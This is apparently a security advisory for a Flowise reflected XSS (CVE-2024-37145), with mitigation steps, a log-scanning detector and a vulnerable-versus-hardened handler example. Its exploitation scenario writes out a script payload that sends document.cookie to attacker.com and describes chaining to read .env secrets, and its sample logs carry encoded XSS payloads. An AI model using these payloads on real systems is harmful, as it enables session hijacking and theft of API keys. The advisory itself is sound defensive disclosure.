CVE-2024-37145: Flowise: reflected XSS enables file read chain via chatflow
Severity: Medium. PoC available.

Flowise 1.4.3 contains a reflected XSS in the unauthenticated `/api/v1/chatflows-streaming/id` endpoint: when a chatflow ID is not found, its value is echoed unsanitized into a text/html 404 response, allowing an attacker to deliver a crafted URL that executes arbitrary JavaScript in any user's browser. Because Flowise ships with no authentication by default, this is a zero-credential network attack against any internet-exposed instance, and a public PoC already exists. More critically, this XSS chains with a path injection flaw to enable arbitrary file reads from the Flowise server, potentially exposing LLM API keys, database credentials, and system prompts stored in environment files. With 16 CVEs now catalogued against Flowise and no patch available at time of CVE publication, organizations should immediately enable authentication, restrict network access to trusted hosts, and rotate any secrets accessible from the server filesystem.
Risk Assessment
Despite a CVSS 6.1 Medium score — reduced by the required user interaction — the effective risk is elevated for several compounding reasons: a working PoC is publicly available; the default no-authentication configuration maximizes exposed attack surface; and the XSS-to-path-injection chain escalates impact well beyond typical reflected XSS into server-side credential exfiltration. Flowise is widely deployed as an LLM orchestration layer with privileged access to AI service API keys and internal data sources. The pattern of 16 cumulative CVEs in this package indicates systemic security debt and increases confidence that additional unpatched paths exist.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| flowise | npm | — | No patch |
Recommended Action
- Enable authentication immediately — set FLOWISE_USERNAME and FLOWISE_PASSWORD environment variables; this single control eliminates the unauthenticated attack surface.
- Restrict network exposure — place Flowise behind a VPN or reverse proxy with IP allowlisting; do not expose the admin UI to the public internet.
- Upgrade — verify the installed version and apply any patch released after July 2024 via the FlowiseAI GitHub releases page.
- Rotate secrets — assume any API keys, credentials, or secrets accessible from the server filesystem are compromised on any previously public-facing instance.
- Detect — monitor web access logs for requests to /api/v1/chatflows-streaming/ containing script tags, javascript: URIs, or URL-encoded equivalents (%3Cscript, %6A%61%76%61%73%63%72%69%70%74).
- Reference GHSL-2023-232 and GHSL-2023-234 from GitHub Security Lab for the full technical disclosure of the attack chain.
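The detection bullet above can be turned into a log scan. The following is an added example, not tooling from the advisory or the Flowise project: it parses combined-format access-log lines (constructed for this example), restricts itself to the `/api/v1/chatflows-streaming/` route named in the advisory, percent-decodes the chatflow ID segment (repeatedly, so double-encoded variants are normalised too), and flags the indicators the advisory lists: `<script` and `javascript:`, in plain or URL-encoded form.

```javascript
// Added example (not Flowise's or the advisory's own code): scan access-log
// lines for the XSS indicators the advisory lists on the vulnerable route.
// Log format and every log line below are constructed for this example.

const TARGET_PREFIX = '/api/v1/chatflows-streaming/';

// Indicators from the advisory; matching happens after decoding, which is what
// catches %3Cscript and %6A%61%76%61%73%63%72%69%70%74 style encodings.
const INDICATORS = [/<script/i, /javascript:/i];

// Percent-decode up to maxPasses times so %253C (double-encoded '<') is also
// normalised. Malformed sequences stop decoding and keep the last good value.
function fullyDecode(s, maxPasses = 3) {
  let cur = s;
  for (let i = 0; i < maxPasses; i++) {
    let next;
    try {
      next = decodeURIComponent(cur);
    } catch (_) {
      break;
    }
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Extract the request target from a combined-format line:
//   ip - - [ts] "METHOD /path HTTP/x.y" status bytes "referer" "ua"
function requestPath(line) {
  const m = line.match(/"[A-Z]+ (\S+) HTTP\/[\d.]+"/);
  return m ? m[1] : null;
}

// Classify one line: flagged only if it hits the target route AND the decoded
// id segment contains one of the indicators.
function classify(line) {
  const path = requestPath(line);
  if (!path) return { flagged: false, reason: 'unparsed' };
  if (!path.startsWith(TARGET_PREFIX)) return { flagged: false, reason: 'other route' };
  const decoded = fullyDecode(path.slice(TARGET_PREFIX.length));
  const hit = INDICATORS.find((re) => re.test(decoded));
  return hit
    ? { flagged: true, reason: `matched ${hit}`, decoded }
    : { flagged: false, reason: 'clean', decoded };
}

// Return only the flagged lines, each with the decoded id for triage.
function scan(lines) {
  return lines.map((l) => ({ line: l, ...classify(l) })).filter((r) => r.flagged);
}

// Constructed sample log (RFC 5737 documentation addresses).
const SAMPLE_LOG = [
  '203.0.113.7 - - [10/Jul/2024:12:00:01 +0000] "GET /api/v1/chatflows-streaming/abc-123 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [10/Jul/2024:12:00:02 +0000] "GET /api/v1/chatflows-streaming/%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 404 97 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [10/Jul/2024:12:00:03 +0000] "GET /api/v1/chatflows-streaming/%6A%61%76%61%73%63%72%69%70%74:alert(1) HTTP/1.1" 404 97 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [10/Jul/2024:12:00:04 +0000] "GET /api/v1/chatflows-streaming/%253Cscript%253E HTTP/1.1" 404 97 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [10/Jul/2024:12:00:05 +0000] "GET /api/v1/chatflows/%3Cscript%3E HTTP/1.1" 404 97 "-" "Mozilla/5.0"',
];

for (const hit of scan(SAMPLE_LOG)) {
  console.log(`${hit.reason}: ${hit.decoded}`);
}
```

The route scoping follows the advisory's wording; if the same instance is also exposed through other routes that echo input, widen `TARGET_PREFIX` accordingly. Reverse proxies often log the request target already decoded once, which is why the decoder is bounded rather than single-pass.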
Technical Details
NVD Description
Flowise is a drag & drop user interface to build a customized large language model flow. In version 1.4.3 of Flowise, a reflected cross-site scripting vulnerability occurs in the `/api/v1/chatflows-streaming/id` endpoint. If the default configuration is used (unauthenticated), an attacker may be able to craft a specially crafted URL that injects JavaScript into the user sessions, allowing the attacker to steal information, create false popups, or even redirect the user to other websites without interaction. If the chatflow ID is not found, its value is reflected in the 404 page, which has type text/html. This allows an attacker to attach arbitrary scripts to the page, allowing an attacker to steal sensitive information. This XSS may be chained with the path injection to allow an attacker without direct access to Flowise to read arbitrary files from the Flowise server. As of time of publication, no known patches are available.
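The root cause described above is a 404 handler that reflects an unknown ID into a text/html body. The following is an added example, not Flowise's own code, showing that pattern beside a hardened handler. The route prefix comes from the advisory; the in-memory chatflow store, the handler functions and the probe value are hypothetical and constructed for this example.

```javascript
// Added example, not Flowise's own code: a minimal Node.js handler that
// reproduces the response pattern the advisory describes (unknown chatflow id
// echoed raw into a text/html 404) next to a hardened equivalent.
// Only the route prefix is taken from the advisory; everything else is constructed.

const ROUTE_PREFIX = '/api/v1/chatflows-streaming/';

// Constructed stand-in for the chatflow store: a single known id.
const chatflows = new Map([['abc-123', { name: 'demo flow' }]]);

// Escape the characters that can break out of an HTML text context.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable pattern: the attacker-controlled id lands unescaped in an HTML
// body, so a browser that follows the link renders and executes it.
function vulnerableNotFound(id) {
  return {
    status: 404,
    headers: { 'Content-Type': 'text/html' },
    body: `Chatflow ${id} not found`,
  };
}

// Hardened pattern: answer with JSON (not rendered as a document), escape the
// echoed value anyway for any client that does render it, and set nosniff so
// the browser cannot reinterpret the content type.
function hardenedNotFound(id) {
  return {
    status: 404,
    headers: {
      'Content-Type': 'application/json; charset=utf-8',
      'X-Content-Type-Options': 'nosniff',
    },
    body: JSON.stringify({ error: 'chatflow not found', id: escapeHtml(id) }),
  };
}

// Route the request. Malformed percent-encoding is rejected up front so it
// never reaches a response builder; notFound is pluggable to show both outcomes.
function handle(urlPath, notFound = hardenedNotFound) {
  if (!urlPath.startsWith(ROUTE_PREFIX)) {
    return { status: 404, headers: { 'Content-Type': 'text/plain' }, body: 'not found' };
  }
  let id;
  try {
    id = decodeURIComponent(urlPath.slice(ROUTE_PREFIX.length));
  } catch (_) {
    return { status: 400, headers: { 'Content-Type': 'text/plain' }, body: 'bad request' };
  }
  const flow = chatflows.get(id);
  if (!flow) return notFound(id);
  return {
    status: 200,
    headers: { 'Content-Type': 'application/json; charset=utf-8' },
    body: JSON.stringify(flow),
  };
}

// Constructed probe value: the standard benign XSS test vector.
const PROBE = '<script>alert(1)</script>';

// Show both behaviours for the same probe when run directly.
console.log('vulnerable:', handle(ROUTE_PREFIX + encodeURIComponent(PROBE), vulnerableNotFound).body);
console.log('hardened:  ', handle(ROUTE_PREFIX + encodeURIComponent(PROBE)).body);
```

Switching the 404 to `application/json` is the change that removes the execution context; the escaping and `nosniff` header are defence in depth for callers that still render the error text. A strict format check on the ID (for example, accepting only the UUID shape the application actually issues) would reject such values even earlier.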
Exploitation Scenario
An attacker identifies a publicly accessible Flowise instance — trivial via Shodan or Censys since Flowise runs on a distinctive default port. They craft a URL to `/api/v1/chatflows-streaming/<script>fetch('https://attacker.com/c?d='+btoa(document.cookie))</script>` and deliver it via phishing email or Slack message to a Flowise user or admin. When the victim clicks the link, Flowise reflects the chatflow ID raw into a text/html 404 response, executing the injected script in the victim's browser context. The attacker captures session tokens or admin credentials. In a second stage, the attacker leverages the path injection chain to issue a request reading the server's .env file, extracting OpenAI and Anthropic API keys along with any database credentials — pivoting to the organization's full AI stack without any further authentication.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Related Vulnerabilities (same package: flowise)
- CVE-2025-59528 (10.0) Flowise: Unauthenticated RCE via MCP config injection
- CVE-2025-61913 (9.9) Flowise: path traversal in file tools leads to RCE
- CVE-2026-30824 (9.8) Flowise: auth bypass exposes NVIDIA NIM container endpoints
- CVE-2026-30821 (9.8) flowise: Arbitrary File Upload enables RCE
- CVE-2025-58434 (9.8) Flowise: auth bypass in reset flow allows full ATO